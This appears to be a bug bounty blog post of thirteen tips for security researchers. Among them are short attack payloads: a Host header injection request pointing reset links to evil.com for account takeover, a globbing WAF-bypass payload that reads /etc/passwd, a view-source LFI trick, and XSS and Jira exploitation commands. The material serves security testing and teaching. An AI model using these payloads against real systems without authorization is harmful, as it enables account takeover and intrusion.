It’s time for another dose of bug bounty tips from the bug hunting community on Twitter, sharing their knowledge for all of us to help us find more vulnerabilities and collect bug bounties.
This is the 9th part and in each part we are publishing 10 or more tips. Let’s start!
- 1. Bypass 403 errors by traversing deeper
- 2. Prevent accidental copy & paste errors in terminal
- 3. Full-featured JavaScript recon automation (JSFScan.sh)
- 4. List of 25 tools for detecting XSS
- 5. Password poisoning bypass to account takeover
- 6. Useful regex for subdomain level extraction
- 7. Find XSS in Java applications in Boolean values
- 8. WAF bypass using globbing
- 9. Scan Jira for known CVEs and misconfigurations
- 10. Calculate favicon hash value for favicon recon
- 11. Browser-based application LFI via view-source
- 12. OneListForAll – “Rockyou” wordlist for web fuzzing
- 13. List of 9 tools for identifying sensitive information
- Conclusion
1. Bypass 403 errors by traversing deeper
If accessing “/.git” directory returns 403 Forbidden, try accessing a common subdirectory like “/.git/config”. Chances are that it will be accessible.
This is because a forbidden directory doesn’t necessarily mean that access to all subdirectories and files in the directory is forbidden as well! Keep this in mind while bug hunting.
Protip: Check also related tips BBT8-11, BBT6-6, BBT4-5 and BBT4-6 for bypassing 403 Forbidden and 401 Unauthorized errors.
2. Prevent accidental copy & paste errors in terminal
The following tip is a prevention from unintentionally executing commands on your system in case you accidentally pasted a multi-line text into your terminal window.
Simply add this into your ~/.inputrc file:
set enable-bracketed-paste
Or just run this one-liner to add it:
echo "set enable-bracketed-paste" >> ~/.inputrc && bind -f ~/.inputrc
Now if you accidentally paste a multi-line text into your terminal, it will NOT get executed and you will save yourself from a potential disaster or at least littering your shell history with garbage.
3. Full-featured JavaScript recon automation (JSFScan.sh)
By @KathanP19 (via @nil0x42)
Source: link
There’s a new cool project in town for a comprehensive JavaScript analysis called JSFScan.sh. It has the following features:
- Gather JSFile links from different sources
- Import files containing JSUrls
- Extract endpoints from JSFiles
- Find secrets stored in JSFiles
- Get JSFiles store locally for manual analysis
- Make a wordlist from JSFiles
- Extract variable names from JSFiles for possible XSS
- Scan JSFiles for DOM-based XSS
Here’s how to use it:
bash JSFScan.sh -l targets.txt -e -s -m -o outdir
Make sure that the targets.txt file contains a list of URLs each nicely prefixed with the http:// or https:// protocol identifier, for a smooth operation.
Results from the tool will be displayed on the console and also stored in the specified output folder along with the collected artifacts.
JSFScan.sh internally uses the following tools to identify and examine the JavaScript files that it finds during analysis:
- Interlace
- SecretFinder
- Waybackurls
- Gau
- SubJS
- Httpx
- JSBeautify
- JSVar.sh
- FinDomXSS.sh
- Hakrawler
- LinkFinder
- GetJsWords.py
It is therefore truly a very comprehensive tool. The installation process takes care of everything which makes it very straightforward and easy to use as well.
4. List of 25 tools for detecting XSS
Here is a compilation of 25 web application security and pentesting tools that can help with discovering XSS (Cross-Site Scripting) vulnerabilities:
- XSSer – Cross Site “Scripter” is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications
- W3af – Web application attack and audit framework capable of finding many different vulnerabilities, not just XSS
- Probely – Commercial website vulnerability scanner with many advanced features and integrations
- Powerfuzzer – Highly automated and fully customizable web fuzzer based on many other open-source fuzzers
- Burp Suite – World leading web application security scanner and toolkit for penetration testers and bug hunters
- Netsparker – Commercial fully integrated, scalable and automated web application security solution
- ZAProxy – OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications
- WebScarab – OWASP WebScarab is a bit dated web application security framework and intercepting proxy tool, but definitely still very usable today
- XSStrike – Advanced XSS detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler
- XSScrapy – Fast, thorough, XSS and SQLi spider. Give it a URL and it will test every link it finds for cross-site scripting and SQL injections
- Wfuzz – Powerful web application security fuzzing tool and library for Python capable of finding many different vulnerabilities and misconfigurations
- ImmuniWeb On-Demand – Web application penetration testing service based on AI technology delivering tailored remediation guidelines and zero false-positives
- Nmap – NSE scripts for detecting XSS: (1) http-xssed, (2) http-stored-xss, (3) http-phpself-xss, (4) http-dombased-xss, (5) http-unsafe-output-escaping
- JMeter – Software mainly for load and stress testing which can also be used as a fuzzer for web application security testing to find XSS and SQLi vulnerabilities
- Wapiti – Web-application vulnerability scanner capable of identifying many different security vulnerabilities, not only XSS
- ZAP-CLI – Command line tool that wraps the OWASP ZAP API for controlling ZAP and executing quick, targeted attacks
- Arachni – Feature-rich, modular, high-performance and multi-platform web application security scanning and testing framework
- XSS Hunter – Highly specialized online service for identifying different kinds of XSS vulnerabilities, including blind XSS, with advanced features such as screenshotting etc.
- Firebug – Discontinued Firefox extension for live debugging, editing, and monitoring of any website’s CSS, HTML, DOM, XHR, and JavaScript engines
- XSSsniper – An automatic XSS discovery tool with mass scanning functionalities
- Skipfish – High-speed web application security reconnaissance tool and vulnerability scanner
- KNOXSS – Online XSS PoC (Proof of Concept) tool that allows you to find and prove XSS flaws
- Acunetix – Commercial web application security scanner and network vulnerability scanner with many advanced features
- Psalm – Free and open-source static analysis tool for identifying security problems in PHP applications with many advanced features and plugins for various PHP frameworks
- Dalfox – Parameter analysis and XSS scanning tool written in Golang with many advanced features
Do you have some other favorite tool for XSS? Please share in the comment section!
5. Password poisoning bypass to account takeover
By @Debian_Hunter
Source: link
This bug bounty tip demonstrates a bypass technique for password reset functionalities which can potentially result in ATO (account takeover).
Consider the following 3 requests:
(1) Normal request:
- Request:
POST /password-reset?user=123 HTTP/1.1
Host: target.com - Link received:
https://target.com/reset-link=1g2f3guy23g
(2) Basic HHI (Host Header Injection):
- Request:
POST /password-reset?user=123 HTTP/1.1
Host: evil.com - Link received:
none
Error 404 - request blocked
(3) Bypass technique:
- Request:
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com - Link received:
https://evil.com/reset-link=1g2f3guy23g
Notice that in bypass we have used absolute URL in the POST request. In such case the Host header should be completely ignored. However, some back-end systems still process it while the front-end don’t – simply an inconsistency.
If successful, this can lead to high severity bugs causing reset token leakage and consequently account takeover and privilege escalation. Here is a real bug report describing the impact nicely in detail.
6. Useful regex for subdomain level extraction
By @imranparray101
Source: link
Higher level subdomains typically tend to be more vulnerable than lower level subdomains. Here is a tip on how to grep for a specific level of subdomains from a list of subdomains:
cat subdomains.txt | grep -P '^(?:[a-z0-9]+\.){MIN,MAX}[^.]*$'
The following table shows what values to provide in the regex in order to match the desired domain levels:
Regex pattern | Domain level match |
---|---|
grep -P '^(?:[a-z0-9]+\.){1}[^.]*$' | 2nd level domains only |
grep -P '^(?:[a-z0-9]+\.){2}[^.]*$' | 3rd level domains only |
grep -P '^(?:[a-z0-9]+\.){2,}[^.]*$' | 3rd level domains or higher |
grep -P '^(?:[a-z0-9]+\.){2,3}[^.]*$' | 3rd to 4th level domains only |
grep -P '^(?:[a-z0-9]+\.){3,}[^.]*$' | 4th level domains or higher |
Here’s an example of matching only 4th level domains from a list of subdomains:
cat subdomains.txt | grep -P '^(?:[a-z0-9]+\.){3}[^.]*$'
This could be useful for prioritizing the work during bug hunting or pentesting when having a large list of targets.
7. Find XSS in Java applications in Boolean values
By @ShawarkOFFICIAL
Source: link
If a Java-based website is fully protected against XSS attacks, look for parameters having Boolean values (true / false), e.g. Sales=true, configure=false etc.
Most of the Java applications convert type [java.lang.String] to [java.lang.Boolean] and return error if expected type is not provided.
If such parameters are replaced with XSS payloads, it is possible to cause an exception that will return user input unfiltered:
Failed to convert property value of type [java.lang.String] to required type [java.lang.Boolean] for property 'vulnerableParameter'; nested exception is java.lang.IllegalArgumentException: Invalid boolean value [woot3<xss>]
An example screenshot:
8. WAF bypass using globbing
By @rizasabuncu
Source: link
If there is a WAF (Web Application Firewall) filtering your RCE (Remote Code Execution) and LFI (Local File Inclusion) payloads, you can try to bypass it with globbing.
Here’s an example:
/usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd
Globbing is a form of pattern expansion which is used for matching of a particular path and it uses the following wildcards to do so:
- ? = any single character
- * = any string, including zero length string!
Globbing works on all popular platforms including Windows (CMD, PowerShell), UNIX and Mac. On UNIX platforms, we can also use the $IFS special variable to substitute whitespaces:
- $IFS = Internal Field Separator = [space], [tab] or a [newline]
For instance, all these should execute “/bin/cat /etc/passwd” on a typical Linux system:
/*/?at$IFS/???/???swd
/****/?at$IFS/???/*swd
/****/?at$IFS/???/*******swd
Try it!
9. Scan Jira for known CVEs and misconfigurations
Have you found a target running Jira application? Here is how you can easily check for multiple known CVEs and misconfigurations in Jira using nuclei scanner workflow:
echo http://jira.targetsite.com | nuclei -t workflows/jira-exploitaiton-workflow.yaml
Nice and easy wins.
To see what all checks are performed, have a look on the actual Jira workflow here:
Note that there are workflows for many other apps, not just for Jira. You can also easily write/add your custom checks as well.
Protip: Make sure to update your templates every now and then. Here’s how easy it is:
nuclei -update-templates
That’s it!
Get nuclei here:
10. Calculate favicon hash value for favicon recon
By @kalimer0x00 (via @intigriti)
Source: link
Here’s a useful command to calculate hash of a favicon on an arbitrary URL:
curl -s -L -k https://gitlab.com/favicon.ico | python3 -c 'import mmh3,sys,codecs; print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),"base64")))'
Note that you have to install the mmh3 python package for the above command to work:
pip3 install mmh3
After obtaining the favicon hash value, we could look it up e.g. using Shodan search engine and discover other web sites with the same favicon hash:
shodan search http.favicon.hash:1278323681
Could be handy indeed!
Protip: Check also these previously published tips related to favicons:
- BBT2-6 – Find Spring Boot servers with Shodan
- BBT3-3 – Find related domains via favicon hash
- BBT8-8 – Database of 500 Favicon hashes (FavFreak)
11. Browser-based application LFI via view-source
By @HusseiN98D
Source: link
This bug bounty tip is useful for web applications which use a web browser to render an URL that you input to them. For instance, this could be an advertisement preview / data validation function of the web application.
It could also be a web app which takes your URL and screenshots it for you. You could simply find it anywhere where an URL is rendered on the server side.
Alright, now the actual tip:
Naturally as a bug hunter, you are going to try to access “file:///etc/passwd”, right? But what if it is blacklisted or somehow blocked? Try accessing “view-source:file:///etc/passwd” instead!
The “view-source” feature is often forgotten by developers in blacklists.
12. OneListForAll – “Rockyou” wordlist for web fuzzing
OneListForAll is a giant wordlist for endpoint web fuzzing compiled from some of the best wordlists currently available, lowercased and deduplicated, ready to be used for bug hunting!
The current release v1.0 contains more than 10.3M entries.
Recommended to be used with ffuf web fuzzer, like this:
ffuf -c -mc all -ac -w onelistforall.txt -u [target.com]/FUZZ
It will probably take some time, but the results should be worth it!
Get the latest wordlist from here:
13. List of 9 tools for identifying sensitive information
By @payloadartist
Source: link
Here’s a compiled list of 9 tools for identifying secrets, API keys, access tokens and similar sensitive data:
- SecretFinder– Python script for finding sensitive data (api keys, access tokens, authorizations, jwt, ..) in JavaScript files
- BurpSuite-Secret_Finder – The above project as a Burp Suite extension for finding sensitive data, processing every HTTP response passing through Burp
- TruffleHog – Searches through Git repositories for high entropy strings and secrets, digging deep into commit history
- Rusty Hog – Suite of secret scanners to detect sensitive information such as API keys, passwords, personal information etc. Based on TruffleHog.
- GitHound – Reconnaissance tool for GitHub code search. Finds exposed API keys using pattern matching, commit history searching and a unique scoring system
- Gitrob – Reconnaissance tool for GitHub repositories with many advanced features and a web interface which is very convenient
- ShhGit – Finds committed secrets and sensitive files across GitHub, Gists, GitLab and BitBucket or your local repositories in real time
- Git-all-secrets – Tool to capture all the Git secrets by leveraging multiple open source Git searching tools
- Leakin – Detects secrets based on regular expressions, containing over 770 patterns with ability to process any file or even scan a folder
With these tools no buried secret should remain a secret no more!
Conclusion
That’s it for this part of the bug bounty tips.
Massive thanks to all the authors for sharing their tools and tips:
- @vict0ni
- @nil0x42
- @KathanP19
- @cry__pto
- @Debian_Hunter
- @imranparray101
- @ShawarkOFFICIAL
- @rizasabuncu
- @pdnuclei
- @kalimer0x00
- @intigriti
- @HusseiN98D
- @Six2dez1
- @payloadartist
Make sure to follow them on Twitter, they will help you stay on top of the bug bounty game!
SHARE THIS